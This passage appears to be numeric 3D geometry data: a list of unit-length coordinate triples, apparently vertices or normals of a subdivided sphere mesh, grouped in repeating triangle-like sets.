[0.246351331472,0.891307473183,0.380633711815],
[0.123895764351,0.943842172623,0.306287169456],
[0.185843646526,0.920180141926,0.34457308054],
[0.190361812711,0.942551255226,0.274516820908],
[0.446935534477,0.85085272789,-0.276221334934],
[0.455528259277,0.867211103439,-0.20109423995],
[0.510783493519,0.826465010643,-0.236761152744],
[0.327503234148,0.922915279865,-0.202408134937],
[0.33188316226,0.935258030891,-0.123069040477],
[0.395605653524,0.903840482235,-0.162998497486],
[0.461539924145,0.878655850887,-0.122248865664],
[0.464636415243,0.88455080986,-0.0410230122507],
[0.524005174637,0.847858190536,-0.0809632539749],
[0.395605653524,0.903840482235,-0.162998497486],
[0.461539924145,0.878655850887,-0.122248865664],
[0.455528259277,0.867211103439,-0.20109423995],
[0.196501940489,0.97295331955,-0.121444880962],
[0.197802826762,0.979394435883,-0.0407496243715],
[0.265506535769,0.960611641407,-0.0820460245013],
[0.0638479366899,0.997179210186,-0.0394601933658],
[0.0638479366899,0.997179210186,0.0394601933658],
[0.130150929093,0.991494178772,0.0],
[0.197802826762,0.979394435883,0.0407496243715],
[0.196501940489,0.97295331955,0.121444880962],
[0.265506535769,0.960611641407,0.0820460245013],
[0.130150929093,0.991494178772,0.0],
[0.197802826762,0.979394435883,0.0407496243715],
[0.197802826762,0.979394435883,-0.0407496243715],
[0.464636415243,0.88455080986,0.0410230122507],
[0.461539924145,0.878655850887,0.122248865664],
[0.524005174637,0.847858190536,0.0809632539749],
[0.33188316226,0.935258030891,0.123069040477],
[0.327503234148,0.922915279865,0.202408134937],
[0.395605653524,0.903840482235,0.162998497486],
[0.455528259277,0.867211103439,0.20109423995],
[0.446935534477,0.85085272789,0.276221334934],
[0.510783493519,0.826465010643,0.236761152744],
[0.395605653524,0.903840482235,0.162998497486],
[0.455528259277,0.867211103439,0.20109423995],
[0.461539924145,0.878655850887,0.122248865664],
[0.265506535769,0.960611641407,-0.0820460245013],
[0.334140062332,0.941618084908,-0.04130198434],
[0.33188316226,0.935258030891,-0.123069040477],
[0.265506535769,0.960611641407,0.0820460245013],
[0.33188316226,0.935258030891,0.123069040477],
[0.334140062332,0.941618084908,0.04130198434],
[0.400968074799,0.916092038155,0.0],
[0.464636415243,0.88455080986,0.0410230122507],
[0.464636415243,0.88455080986,-0.0410230122507],
[0.334140062332,0.941618084908,0.04130198434],
[0.400968074799,0.916092038155,0.0],
[0.334140062332,0.941618084908,-0.04130198434],
[0.82464236021,0.564633131027,0.0339771322906],
[0.830952167511,0.548688352108,0.091976031661],
[0.858619451523,0.509656965733,0.0549761541188],
[0.757922053337,0.643326640129,0.108097285032],
[0.759706020355,0.627150595188,0.171839639544],
[0.798110127449,0.588087081909,0.131048902869],
[0.834331154823,0.529480218887,0.153434738517],
[0.834127128124,0.506734728813,0.217834427953],
[0.866019308567,0.468421578407,0.174905076623],
[0.798110127449,0.588087081909,0.131048902869],
[0.834331154823,0.529480218887,0.153434738517],
[0.830952167511,0.548688352108,0.091976031661],
[0.669747889042,0.718357801437,0.188148602843],
[0.665616393089,0.700865805149,0.256401896477],
[0.715529501438,0.665048420429,0.213841319084],
[0.560828924179,0.782811582088,0.269586592913],
[0.550243675709,0.762617051601,0.340069264174],
[0.610302150249,0.733673810959,0.298754066229],
[0.657660841942,0.678621411324,0.327040165663],
[0.645450055599,0.65135627985,0.398910075426],
[0.701809465885,0.618283927441,0.353819847107],
[0.610302150249,0.733673810959,0.298754066229],
[0.657660841942,0.678621411324,0.327040165663],
[0.665616393089,0.700865805149,0.256401896477],
[0.829719662666,0.480284929276,0.284414708614],
[0.820587992668,0.450116455555,0.352179646492],
[0.857896447182,0.413926929235,0.3044308424],
[0.74177056551,0.553625464439,0.378517180681],
[0.726413309574,0.520354926586,0.44894811511],
[0.776785671711,0.485873311758,0.400663375854],
[0.806385576725,0.416404157877,0.419940322638],
[0.787004828453,0.379529476166,0.486395716667],
[0.830415487289,0.346611320972,0.436200261116],
[0.776785671711,0.485873311758,0.400663375854],
[0.806385576725,0.416404157877,0.419940322638],
[0.820587992668,0.450116455555,0.352179646492],
[0.715529501438,0.665048420429,0.213841319084],
[0.757998526096,0.606988489628,0.238753452897],
[0.759706020355,0.627150595188,0.171839639544],
[0.701809465885,0.618283927441,0.353819847107],
[0.74177056551,0.553625464439,0.378517180681],
[0.752189457417,0.582528710365,0.308011889458],
[0.796284377575,0.545040607452,0.26241543889],
[0.829719662666,0.480284929276,0.284414708614],
[0.834127128124,0.506734728813,0.217834427953],
[0.752189457417,0.582528710365,0.308011889458],
[0.796284377575,0.545040607452,0.26241543889],
[0.757998526096,0.606988489628,0.238753452897],
[0.436200261116,0.830415487289,0.346611320972],
[0.419940322638,0.806385576725,0.416404157877],
[0.486395716667,0.787004828453,0.379529476166],
[0.3044308424,0.857896447182,0.413926929235],
[0.284414708614,0.829719662666,0.480284929276],
[0.352179646492,0.820587992668,0.450116455555],
[0.400663375854,0.776785671711,0.485873311758],
[0.378517180681,0.74177056551,0.553625464439],
[0.44894811511,0.726413309574,0.520354926586],
[0.352179646492,0.820587992668,0.450116455555],
[0.400663375854,0.776785671711,0.485873311758],
[0.419940322638,0.806385576725,0.416404157877],
[0.174905076623,0.866019308567,0.468421578407],
[0.153434738517,0.834331154823,0.529480218887],
[0.217834427953,0.834127128124,0.506734728813],
[0.0549761541188,0.858619451523,0.509656965733],
[0.0339771322906,0.82464236021,0.564633131027],
[0.091976031661,0.830952167511,0.548688352108],
[0.131048902869,0.798110127449,0.588087081909],
[0.108097285032,0.757922053337,0.643326640129],
[0.171839639544,0.759706020355,0.627150595188],
[0.091976031661,0.830952167511,0.548688352108],
[0.131048902869,0.798110127449,0.588087081909],
[0.153434738517,0.834331154823,0.529480218887],
[0.353819847107,0.701809465885,0.618283927441],
[0.327040165663,0.657660841942,0.678621411324],
[0.398910075426,0.645450055599,0.65135627985],
[0.213841319084,0.715529501438,0.665048420429],
[0.188148602843,0.669747889042,0.718357801437],
[0.256401896477,0.665616393089,0.700865805149],
[0.298754066229,0.610302150249,0.733673810959],
[0.269586592913,0.560828924179,0.782811582088],
[0.340069264174,0.550243675709,0.762617051601],
[0.256401896477,0.665616393089,0.700865805149],
[0.298754066229,0.610302150249,0.733673810959],
[0.327040165663,0.657660841942,0.678621411324],
[0.217834427953,0.834127128124,0.506734728813],
[0.26241543889,0.796284377575,0.545040607452],
[0.284414708614,0.829719662666,0.480284929276],
[0.171839639544,0.759706020355,0.627150595188],
[0.213841319084,0.715529501438,0.665048420429],
[0.238753452897,0.757998526096,0.606988489628],
[0.308011889458,0.752189457417,0.582528710365],
[0.353819847107,0.701809465885,0.618283927441],
[0.378517180681,0.74177056551,0.553625464439],
[0.238753452897,0.757998526096,0.606988489628],
[0.308011889458,0.752189457417,0.582528710365],
[0.26241543889,0.796284377575,0.545040607452],
[0.762617051601,0.340069264174,0.550243675709],
[0.733673810959,0.298754066229,0.610302150249],
[0.782811582088,0.269586592913,0.560828924179],
[0.65135627985,0.398910075426,0.645450055599],
[0.618283927441,0.353819847107,0.701809465885],
[0.678621411324,0.327040165663,0.657660841942],
[0.700865805149,0.256401896477,0.665616393089],
[0.665048420429,0.213841319084,0.715529501438],
[0.718357801437,0.188148602843,0.669747889042],
[0.678621411324,0.327040165663,0.657660841942],
[0.700865805149,0.256401896477,0.665616393089],
[0.733673810959,0.298754066229,0.610302150249],
[0.520354926586,0.44894811511,0.726413309574],
[0.485873311758,0.400663375854,0.776785671711],
[0.553625464439,0.378517180681,0.74177056551],
[0.379529476166,0.486395716667,0.787004828453],
[0.346611320972,0.436200261116,0.830415487289],
[0.416404157877,0.419940322638,0.806385576725],
[0.450116455555,0.352179646492,0.820587992668],
[0.413926929235,0.3044308424,0.857896447182],
[0.480284929276,0.284414708614,0.829719662666],
[0.416404157877,0.419940322638,0.806385576725],
[0.450116455555,0.352179646492,0.820587992668],
[0.485873311758,0.400663375854,0.776785671711],
[0.627150595188,0.171839639544,0.759706020355],
[0.588087081909,0.131048902869,0.798110127449],
[0.643326640129,0.108097285032,0.757922053337],
[0.506734728813,0.217834427953,0.834127128124],
[0.468421578407,0.174905076623,0.866019308567],
[0.529480218887,0.153434738517,0.834331154823],
[0.548688352108,0.091976031661,0.830952167511],
[0.509656965733,0.0549761541188,0.858619451523],
[0.564633131027,0.0339771322906,0.82464236021],
[0.529480218887,0.153434738517,0.834331154823],
[0.548688352108,0.091976031661,0.830952167511],
[0.588087081909,0.131048902869,0.798110127449],
[0.553625464439,0.378517180681,0.74177056551],
[0.582528710365,0.308011889458,0.752189457417],
[0.618283927441,0.353819847107,0.701809465885],
[0.480284929276,0.284414708614,0.829719662666],
[0.506734728813,0.217834427953,0.834127128124],
[0.545040607452,0.26241543889,0.796284377575],
[0.606988489628,0.238753452897,0.757998526096],
[0.627150595188,0.171839639544,0.759706020355],
[0.665048420429,0.213841319084,0.715529501438],
[0.545040607452,0.26241543889,0.796284377575],
[0.606988489628,0.238753452897,0.757998526096],
[0.582528710365,0.308011889458,0.752189457417],
[0.486395716667,0.787004828453,0.379529476166],
[0.535965919495,0.737060189247,0.411682873964],
[0.550243675709,0.762617051601,0.340069264174],
[0.44894811511,0.726413309574,0.520354926586],
[0.495975226164,0.669751524925,0.552667617798],
[0.517854511738,0.706037700176,0.483050197363],
[0.58378881216,0.680853009224,0.44230055809],
[0.628728508949,0.619044244289,0.470621615648],
[0.645450055599,0.65135627985,0.398910075426],
[0.517854511738,0.706037700176,0.483050197363],
[0.58378881216,0.680853009224,0.44230055809],
[0.535965919495,0.737060189247,0.411682873964],
[0.398910075426,0.645450055599,0.65135627985],
[0.44230055809,0.58378881216,0.680853009224],
[0.470621615648,0.628728508949,0.619044244289],
[0.340069264174,0.550243675709,0.762617051601],
[0.379529476166,0.486395716667,0.787004828453],
[0.411682873964,0.535965919495,0.737060189247],
[0.483050197363,0.517854511738,0.706037700176],
[0.520354926586,0.44894811511,0.726413309574],
[0.552667617798,0.495975226164,0.669751524925],
[0.411682873964,0.535965919495,0.737060189247],
[0.483050197363,0.517854511738,0.706037700176],
[0.44230055809,0.58378881216,0.680853009224],
[0.669751524925,0.552667617798,0.495975226164],
[0.706037700176,0.483050197363,0.517854511738],
[0.726413309574,0.520354926586,0.44894811511],
[0.619044244289,0.470621615648,0.628728508949],
[0.65135627985,0.398910075426,0.645450055599],
[0.680853009224,0.44230055809,0.58378881216],
[0.737060189247,0.411682873964,0.535965919495],
[0.762617051601,0.340069264174,0.550243675709],
[0.787004828453,0.379529476166,0.486395716667],
[0.680853009224,0.44230055809,0.58378881216],
[0.737060189247,0.411682873964,0.535965919495],
[0.706037700176,0.483050197363,0.517854511738],
[0.470621615648,0.628728508949,0.619044244289],
[0.540649950504,0.607478022575,0.581951975822],
[0.495975226164,0.669751524925,0.552667617798],
[0.552667617798,0.495975226164,0.669751524925],
[0.619044244289,0.470621615648,0.628728508949],
[0.581951975822,0.540649950504,0.607478022575],
[0.607478022575,0.581951975822,0.540649950504],
[0.669751524925,0.552667617798,0.495975226164],
[0.628728508949,0.619044244289,0.470621615648],
[0.581951975822,0.540649950504,0.607478022575],
[0.607478022575,0.581951975822,0.540649950504],
[0.540649950504,0.607478022575,0.581951975822],
[0.8796184659,-0.475679844618,0.0],
[0.887796461582,-0.456712335348,0.0568443164229],
[0.858619451523,-0.509656965733,0.0549761541188],
[0.932827115059,-0.360324263573,0.0],
[0.940329909325,-0.334895044565,0.0602079555392],
[0.915323853493,-0.398431301117,0.0586068555713],
[0.892938017845,-0.434652328491,0.117213711143],
[0.894335091114,-0.409316182137,0.180623859167],
[0.866019308567,-0.468421578407,0.174905076623],
[0.915323853493,-0.398431301117,0.0586068555713],
[0.892938017845,-0.434652328491,0.117213711143],
[0.887796461582,-0.456712335348,0.0568443164229],
[0.974178731441,-0.225778326392,0.0],
[0.979053080082,-0.193714544177,0.0626873448491],
[0.961880862713,-0.266443610191,0.0615878328681],
[0.997029185295,-0.0770247355103,0.0],
[0.997179210186,-0.0394601933658,0.0638479366899],
[0.991025745869,-0.117650069296,0.0634539350867],
[0.978907585144,-0.158833146095,0.128498718143],
[0.97295331955,-0.121444880962,0.196501940489],
[0.960443258286,-0.199805602431,0.193975359201],
[0.991025745869,-0.117650069296,0.0634539350867],
[0.978907585144,-0.158833146095,0.128498718143],
[0.979053080082,-0.193714544177,0.0626873448491],
[0.891307473183,-0.380633711815,0.246351331472],
[0.883275330067,-0.348686188459,0.313436716795],
[0.857896447182,-0.413926929235,0.3044308424],
[0.935745954514,-0.239766731858,0.258633822203],
[0.922915279865,-0.202408134937,0.327503234148],
[0.905284404755,-0.277958005667,0.321246802807],
[0.869839549065,-0.313733518124,0.380723625422],
[0.85085272789,-0.276221334934,0.446935534477],
[0.830415487289,-0.346611320972,0.436200261116],
[0.905284404755,-0.277958005667,0.321246802807],
[0.869839549065,-0.313733518124,0.380723625422],
[0.883275330067,-0.348686188459,0.313436716795],
[0.961880862713,-0.266443610191,0.0615878328681],
[0.943842172623,-0.306287169456,0.123895764351],
[0.940329909325,-0.334895044565,0.0602079555392],
[0.960443258286,-0.199805602431,0.193975359201],
[0.935745954514,-0.239766731858,0.258633822203],
[0.942551255226,-0.274516820908,0.190361812711],
[0.920180141926,-0.34457308054,0.185843646526],
[0.891307473183,-0.380633711815,0.246351331472],
[0.894335091114,-0.409316182137,0.180623859167],
[0.942551255226,-0.274516820908,0.190361812711],
[0.920180141926,-0.34457308054,0.185843646526],
[0.943842172623,-0.306287169456,0.123895764351],
[0.997029185295,0.0770247355103,0.0],
[0.991025745869,0.117650069296,0.0634539350867],
[0.997179210186,0.0394601933658,0.0638479366899],
[0.974178731441,0.225778326392,0.0],
[0.961880862713,0.266443610191,0.0615878328681],
[0.979053080082,0.193714544177,0.0626873448491],
[0.978907585144,0.158833146095,0.128498718143],
[0.960443258286,0.199805602431,0.193975359201],
[0.97295331955,0.121444880962,0.196501940489],
[0.979053080082,0.193714544177,0.0626873448491],
[0.978907585144,0.158833146095,0.128498718143],
[0.991025745869,0.117650069296,0.0634539350867],
[0.932827115059,0.360324263573,0.0],
[0.915323853493,0.398431301117,0.0586068555713],
[0.940329909325,0.334895044565,0.0602079555392],
[0.8796184659,0.475679844618,0.0],
[0.858619451523,0.509656965733,0.0549761541188],
[0.887796461582,0.456712335348,0.0568443164229],
[0.892938017845,0.434652328491,0.117213711143],
[0.866019308567,0.468421578407,0.174905076623],
[0.894335091114,0.409316182137,0.180623859167],
[0.887796461582,0.456712335348,0.0568443164229],
[0.892938017845,0.434652328491,0.117213711143],
[0.915323853493,0.398431301117,0.0586068555713],
[0.935745954514,0.239766731858,0.258633822203],
[0.905284404755,0.277958005667,0.321246802807],
[0.922915279865,0.202408134937,0.327503234148],
[0.891307473183,0.380633711815,0.246351331472],
[0.857896447182,0.413926929235,0.3044308424],
[0.883275330067,0.348686188459,0.313436716795],
[0.869839549065,0.313733518124,0.380723625422],
[0.830415487289,0.346611320972,0.436200261116],
[0.85085272789,0.276221334934,0.446935534477],
[0.883275330067,0.348686188459,0.313436716795],
[0.869839549065,0.313733518124,0.380723625422],
[0.905284404755,0.277958005667,0.321246802807],
[0.940329909325,0.334895044565,0.0602079555392],
[0.943842172623,0.306287169456,0.123895764351],
[0.961880862713,0.266443610191,0.0615878328681],
[0.894335091114,0.409316182137,0.180623859167],
[0.891307473183,0.380633711815,0.246351331472],
[0.920180141926,0.34457308054,0.185843646526],
[0.942551255226,0.274516820908,0.190361812711],
[0.935745954514,0.239766731858,0.258633822203],
[0.960443258286,0.199805602431,0.193975359201],
[0.920180141926,0.34457308054,0.185843646526],
[0.942551255226,0.274516820908,0.190361812711],
[0.943842172623,0.306287169456,0.123895764351],
[0.826465010643,-0.236761152744,0.510783493519],
[0.797127783298,-0.196083456278,0.571085453033],
[0.782811582088,-0.269586592913,0.560828924179],
[0.847858190536,-0.0809632539749,0.524005174637],
[0.81225925684,-0.0399611219764,0.581926107407],
[0.807120084763,-0.119124859571,0.578244268894],
[0.763553202152,-0.154971644282,0.62687343359],
[0.726636230946,-0.114190116525,0.677466154099],
[0.718357801437,-0.188148602843,0.669747889042],
[0.807120084763,-0.119124859571,0.578244268894],
[0.763553202152,-0.154971644282,0.62687343359],
[0.797127783298,-0.196083456278,0.571085453033],
[0.847858190536,0.0809632539749,0.524005174637],
[0.807120084763,0.119124859571,0.578244268894],
[0.81225925684,0.0399611219764,0.581926107407],
[0.826465010643,0.236761152744,0.510783493519],
[0.782811582088,0.269586592913,0.560828924179],
[0.797127783298,0.196083456278,0.571085453033],
[0.763553202152,0.154971644282,0.62687343359],
[0.718357801437,0.188148602843,0.669747889042],
[0.726636230946,0.114190116525,0.677466154099],
[0.797127783298,0.196083456278,0.571085453033],
[0.763553202152,0.154971644282,0.62687343359],
[0.807120084763,0.119124859571,0.578244268894],
[0.687358558178,-0.0744211226702,0.722495436668],
[0.646693944931,-0.0362210273743,0.761889100075],
[0.643326640129,-0.108097285032,0.757922053337],
[0.687358558178,0.0744211226702,0.722495436668],
[0.643326640129,0.108097285032,0.757922053337],
[0.646693944931,0.0362210273743,0.761889100075],
[0.605532705784,0.0,0.79582041502],
[0.564633131027,0.0339771322906,0.82464236021],
[0.564633131027,-0.0339771322906,0.82464236021],
[0.646693944931,0.0362210273743,0.761889100075],
[0.605532705784,0.0,0.79582041502],
[0.646693944931,-0.0362210273743,0.761889100075],
[0.81225925684,0.0399611219764,0.581926107407],
[0.772890508175,0.0,0.634539365768],
[0.81225925684,-0.0399611219764,0.581926107407],
[0.726636230946,0.114190116525,0.677466154099],
[0.687358558178,0.0744211226702,0.722495436668],
[0.730884253979,0.0382858961821,0.68142670393],
[0.730884253979,-0.0382858961821,0.68142670393],
[0.687358558178,-0.0744211226702,0.722495436668],
[0.726636230946,-0.114190116525,0.677466154099],
[0.730884253979,0.0382858961821,0.68142670393],
[0.730884253979,-0.0382858961821,0.68142670393],
[0.772890508175,0.0,0.634539365768],
[0.997179210186,0.0394601933658,0.0638479366899],
[0.991494178772,0.0,0.130150929093],
[0.997179210186,-0.0394601933658,0.0638479366899],
[0.97295331955,0.121444880962,0.196501940489],
[0.960611641407,0.0820460245013,0.265506535769],
[0.979394435883,0.0407496243715,0.197802826762],
[0.979394435883,-0.0407496243715,0.197802826762],
[0.960611641407,-0.0820460245013,0.265506535769],
[0.97295331955,-0.121444880962,0.196501940489],
[0.979394435883,0.0407496243715,0.197802826762],
[0.979394435883,-0.0407496243715,0.197802826762],
[0.991494178772,0.0,0.130150929093],
[0.922915279865,0.202408134937,0.327503234148],
[0.903840482235,0.162998497486,0.395605653524],
[0.935258030891,0.123069040477,0.33188316226],
[0.85085272789,0.276221334934,0.446935534477],
[0.826465010643,0.236761152744,0.510783493519],
[0.867211103439,0.20109423995,0.455528259277],
[0.878655850887,0.122248865664,0.461539924145],
[0.847858190536,0.0809632539749,0.524005174637],
[0.88455080986,0.0410230122507,0.464636415243],
[0.867211103439,0.20109423995,0.455528259277],
[0.878655850887,0.122248865664,0.461539924145],
[0.903840482235,0.162998497486,0.395605653524],
[0.935258030891,-0.123069040477,0.33188316226],
[0.903840482235,-0.162998497486,0.395605653524],
[0.922915279865,-0.202408134937,0.327503234148],
[0.88455080986,-0.0410230122507,0.464636415243],
[0.847858190536,-0.0809632539749,0.524005174637],
[0.878655850887,-0.122248865664,0.461539924145],
[0.867211103439,-0.20109423995,0.455528259277],
[0.826465010643,-0.236761152744,0.510783493519],
[0.85085272789,-0.276221334934,0.446935534477],
[0.878655850887,-0.122248865664,0.461539924145],
[0.867211103439,-0.20109423995,0.455528259277],
[0.903840482235,-0.162998497486,0.395605653524],
[0.935258030891,0.123069040477,0.33188316226],
[0.941618084908,0.04130198434,0.334140062332],
[0.960611641407,0.0820460245013,0.265506535769],
[0.88455080986,0.0410230122507,0.464636415243],
[0.88455080986,-0.0410230122507,0.464636415243],
[0.916092038155,0.0,0.400968074799],
[0.941618084908,-0.04130198434,0.334140062332],
[0.935258030891,-0.123069040477,0.33188316226],
[0.960611641407,-0.0820460245013,0.265506535769],
[0.916092038155,0.0,0.400968074799],
[0.941618084908,-0.04130198434,0.334140062332],
[0.941618084908,0.04130198434,0.334140062332],
[-0.564633131027,0.0339771322906,0.82464236021],
[-0.605532705784,0.0,0.79582041502],
[-0.564633131027,-0.0339771322906,0.82464236021],
[-0.643326640129,0.108097285032,0.757922053337],
[-0.687358558178,0.0744211226702,0.722495436668],
[-0.646693944931,0.0362210273743,0.761889100075],
[-0.646693944931,-0.0362210273743,0.761889100075],
[-0.687358558178,-0.0744211226702,0.722495436668],
[-0.643326640129,-0.108097285032,0.757922053337],
[-0.646693944931,0.0362210273743,0.761889100075],
[-0.646693944931,-0.0362210273743,0.761889100075],
[-0.605532705784,0.0,0.79582041502],
[-0.718357801437,0.188148602843,0.669747889042],
[-0.763553202152,0.154971644282,0.62687343359],
[-0.726636230946,0.114190116525,0.677466154099],
[-0.782811582088,0.269586592913,0.560828924179],
[-0.826465010643,0.236761152744,0.510783493519],
[-0.797127783298,0.196083456278,0.571085453033],
[-0.807120084763,0.119124859571,0.578244268894],
[-0.847858190536,0.0809632539749,0.524005174637],
[-0.81225925684,0.0399611219764,0.581926107407],
[-0.797127783298,0.196083456278,0.571085453033],
[-0.807120084763,0.119124859571,0.578244268894],
[-0.763553202152,0.154971644282,0.62687343359],
[-0.726636230946,-0.114190116525,0.677466154099],
[-0.763553202152,-0.154971644282,0.62687343359],
[-0.718357801437,-0.188148602843,0.669747889042],
[-0.81225925684,-0.0399611219764,0.581926107407],
[-0.847858190536,-0.0809632539749,0.524005174637],
[-0.807120084763,-0.119124859571,0.578244268894],
[-0.797127783298,-0.196083456278,0.571085453033],
[-0.826465010643,-0.236761152744,0.510783493519],
[-0.782811582088,-0.269586592913,0.560828924179],
[-0.807120084763,-0.119124859571,0.578244268894],
[-0.797127783298,-0.196083456278,0.571085453033],
[-0.763553202152,-0.154971644282,0.62687343359],
[-0.726636230946,0.114190116525,0.677466154099],
[-0.730884253979,0.0382858961821,0.68142670393],
[-0.687358558178,0.0744211226702,0.722495436668],
[-0.81225925684,0.0399611219764,0.581926107407],
[-0.81225925684,-0.0399611219764,0.581926107407],
[-0.772890508175,0.0,0.634539365768],
[-0.730884253979,-0.0382858961821,0.68142670393],
[-0.726636230946,-0.114190116525,0.677466154099],
[-0.687358558178,-0.0744211226702,0.722495436668],
[-0.772890508175,0.0,0.634539365768],
[-0.730884253979,-0.0382858961821,0.68142670393],
[-0.730884253979,0.0382858961821,0.68142670393],
[-0.830415487289,0.346611320972,0.436200261116],
[-0.869839549065,0.313733518124,0.380723625422],
[-0.85085272789,0.276221334934,0.446935534477],
[-0.857896447182,0.413926929235,0.3044308424],
[-0.891307473183,0.380633711815,0.246351331472],
[-0.883275330067,0.348686188459,0.313436716795],
[-0.905284404755,0.277958005667,0.321246802807],
[-0.935745954514,0.239766731858,0.258633822203],
[-0.922915279865,0.202408134937,0.327503234148],
[-0.883275330067,0.348686188459,0.313436716795],
[-0.905284404755,0.277958005667,0.321246802807],
[-0.869839549065,0.313733518124,0.380723625422],
[-0.866019308567,0.468421578407,0.174905076623],
[-0.892938017845,0.434652328491,0.117213711143],
[-0.894335091114,0.409316182137,0.180623859167],
[-0.858619451523,0.509656965733,0.0549761541188],
[-0.8796184659,0.475679844618,0.0],
[-0.887796461582,0.456712335348,0.0568443164229],
[-0.915323853493,0.398431301117,0.0586068555713],
[-0.932827115059,0.360324263573,0.0],
[-0.940329909325,0.334895044565,0.0602079555392],
[-0.887796461582,0.456712335348,0.0568443164229],
[-0.915323853493,0.398431301117,0.0586068555713],
[-0.892938017845,0.434652328491,0.117213711143],
[-0.960443258286,0.199805602431,0.193975359201],
[-0.978907585144,0.158833146095,0.128498718143],
[-0.97295331955,0.121444880962,0.196501940489],
[-0.961880862713,0.266443610191,0.0615878328681],
[-0.974178731441,0.225778326392,0.0],
[-0.979053080082,0.193714544177,0.0626873448491],
[-0.991025745869,0.117650069296,0.0634539350867],
[-0.997029185295,0.0770247355103,0.0],
[-0.997179210186,0.0394601933658,0.0638479366899],
[-0.979053080082,0.193714544177,0.0626873448491],
[-0.991025745869,0.117650069296,0.0634539350867],
[-0.978907585144,0.158833146095,0.128498718143],
[-0.894335091114,0.409316182137,0.180623859167],
[-0.920180141926,0.34457308054,0.185843646526],
[-0.891307473183,0.380633711815,0.246351331472],
[-0.940329909325,0.334895044565,0.0602079555392],
[-0.961880862713,0.266443610191,0.0615878328681],
[-0.943842172623,0.306287169456,0.123895764351],
[-0.942551255226,0.274516820908,0.190361812711],
[-0.960443258286,0.199805602431,0.193975359201],
[-0.935745954514,0.239766731858,0.258633822203],
[-0.943842172623,0.306287169456,0.123895764351],
[-0.942551255226,0.274516820908,0.190361812711],
[-0.920180141926,0.34457308054,0.185843646526],
[-0.85085272789,-0.276221334934,0.446935534477],
[-0.869839549065,-0.313733518124,0.380723625422],
[-0.830415487289,-0.346611320972,0.436200261116],
[-0.922915279865,-0.202408134937,0.327503234148],
[-0.935745954514,-0.239766731858,0.258633822203],
[-0.905284404755,-0.277958005667,0.321246802807],
[-0.883275330067,-0.348686188459,0.313436716795],
[-0.891307473183,-0.380633711815,0.246351331472],
[-0.857896447182,-0.413926929235,0.3044308424],
[-0.905284404755,-0.277958005667,0.321246802807],
[-0.883275330067,-0.348686188459,0.313436716795],
[-0.869839549065,-0.313733518124,0.380723625422],
[-0.97295331955,-0.121444880962,0.196501940489],
[-0.978907585144,-0.158833146095,0.128498718143],
[-0.960443258286,-0.199805602431,0.193975359201],
[-0.997179210186,-0.0394601933658,0.0638479366899],
[-0.997029185295,-0.0770247355103,0.0],
[-0.991025745869,-0.117650069296,0.0634539350867],
[-0.979053080082,-0.193714544177,0.0626873448491],
[-0.974178731441,-0.225778326392,0.0],
[-0.961880862713,-0.266443610191,0.0615878328681],
[-0.991025745869,-0.117650069296,0.0634539350867],
[-0.979053080082,-0.193714544177,0.0626873448491],
[-0.978907585144,-0.158833146095,0.128498718143],
[-0.894335091114,-0.409316182137,0.180623859167],
[-0.892938017845,-0.434652328491,0.117213711143],
[-0.866019308567,-0.468421578407,0.174905076623],
[-0.940329909325,-0.334895044565,0.0602079555392],
[-0.932827115059,-0.360324263573,0.0],
[-0.915323853493,-0.398431301117,0.0586068555713],
[-0.887796461582,-0.456712335348,0.0568443164229],
[-0.8796184659,-0.475679844618,0.0],
[-0.858619451523,-0.509656965733,0.0549761541188],
[-0.915323853493,-0.398431301117,0.0586068555713],
[-0.887796461582,-0.456712335348,0.0568443164229],
[-0.892938017845,-0.434652328491,0.117213711143],
[-0.960443258286,-0.199805602431,0.193975359201],
[-0.942551255226,-0.274516820908,0.190361812711],
[-0.935745954514,-0.239766731858,0.258633822203],
[-0.961880862713,-0.266443610191,0.0615878328681],
[-0.940329909325,-0.334895044565,0.0602079555392],
[-0.943842172623,-0.306287169456,0.123895764351],
[-0.920180141926,-0.34457308054,0.185843646526],
[-0.894335091114,-0.409316182137,0.180623859167],
[-0.891307473183,-0.380633711815,0.246351331472],
[-0.943842172623,-0.306287169456,0.123895764351],
[-0.920180141926,-0.34457308054,0.185843646526],
[-0.942551255226,-0.274516820908,0.190361812711],
[-0.85085272789,0.276221334934,0.446935534477],
[-0.867211103439,0.20109423995,0.455528259277],
[-0.826465010643,0.236761152744,0.510783493519],
[-0.922915279865,0.202408134937,0.327503234148],
[-0.935258030891,0.123069040477,0.33188316226],
[-0.903840482235,0.162998497486,0.395605653524],
[-0.878655850887,0.122248865664,0.461539924145],
[-0.88455080986,0.0410230122507,0.464636415243],
[-0.847858190536,0.0809632539749,0.524005174637],
[-0.903840482235,0.162998497486,0.395605653524],
[-0.878655850887,0.122248865664,0.461539924145],
[-0.867211103439,0.20109423995,0.455528259277],
[-0.97295331955,0.121444880962,0.196501940489],
[-0.979394435883,0.0407496243715,0.197802826762],
[-0.960611641407,0.0820460245013,0.265506535769],
[-0.997179210186,0.0394601933658,0.0638479366899],
[-0.997179210186,-0.0394601933658,0.0638479366899],
[-0.991494178772,0.0,0.130150929093],
[-0.979394435883,-0.0407496243715,0.197802826762],
[-0.97295331955,-0.121444880962,0.196501940489],
[-0.960611641407,-0.0820460245013,0.265506535769],
[-0.991494178772,0.0,0.130150929093],
[-0.979394435883,-0.0407496243715,0.197802826762],
[-0.979394435883,0.0407496243715,0.197802826762],
[-0.88455080986,-0.0410230122507,0.464636415243],
[-0.878655850887,-0.122248865664,0.461539924145],
[-0.847858190536,-0.0809632539749,0.524005174637],
[-0.935258030891,-0.123069040477,0.33188316226],
[-0.922915279865,-0.202408134937,0.327503234148],
[-0.903840482235,-0.162998497486,0.395605653524],
[-0.867211103439,-0.20109423995,0.455528259277],
[-0.85085272789,-0.276221334934,0.446935534477],
[-0.826465010643,-0.236761152744,0.510783493519],
[-0.903840482235,-0.162998497486,0.395605653524],
[-0.867211103439,-0.20109423995,0.455528259277],
[-0.878655850887,-0.122248865664,0.461539924145],
[-0.960611641407,0.0820460245013,0.265506535769],
[-0.941618084908,0.04130198434,0.334140062332],
[-0.935258030891,0.123069040477,0.33188316226],
[-0.960611641407,-0.0820460245013,0.265506535769],
[-0.935258030891,-0.123069040477,0.33188316226],
[-0.941618084908,-0.04130198434,0.334140062332],
[-0.916092038155,0.0,0.400968074799],
[-0.88455080986,-0.0410230122507,0.464636415243],
[-0.88455080986,0.0410230122507,0.464636415243],
[-0.941618084908,-0.04130198434,0.334140062332],
[-0.916092038155,0.0,0.400968074799],
[-0.941618084908,0.04130198434,0.334140062332],
[-0.509656965733,0.0549761541188,0.858619451523],
[-0.548688352108,0.091976031661,0.830952167511],
[-0.564633131027,0.0339771322906,0.82464236021],
[-0.468421578407,0.174905076623,0.866019308567],
